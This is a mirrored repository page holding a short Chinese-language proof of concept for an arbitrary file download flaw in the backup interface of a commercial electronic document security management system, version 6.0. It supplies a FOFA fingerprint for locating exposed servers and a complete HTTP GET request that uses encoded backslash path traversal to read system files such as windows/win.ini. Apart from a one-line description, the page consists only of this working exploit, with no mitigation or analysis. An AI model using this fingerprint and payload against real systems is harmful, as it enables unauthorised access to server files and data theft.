admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 19:07:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/电子文档安全管理系统/电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞.md

22 lines
687 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞
济南上邦电子科技有限公司电子文档安全管理系统 V6.0 resources/backup存在任意文件下载漏洞攻击者可通过该漏洞获取服务器所有文件信息
## fofa
```javascript
body="docsafe/docsafe.nocache.js"
```
## poc
```javascript
GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
```
Reference in New Issue Copy Permalink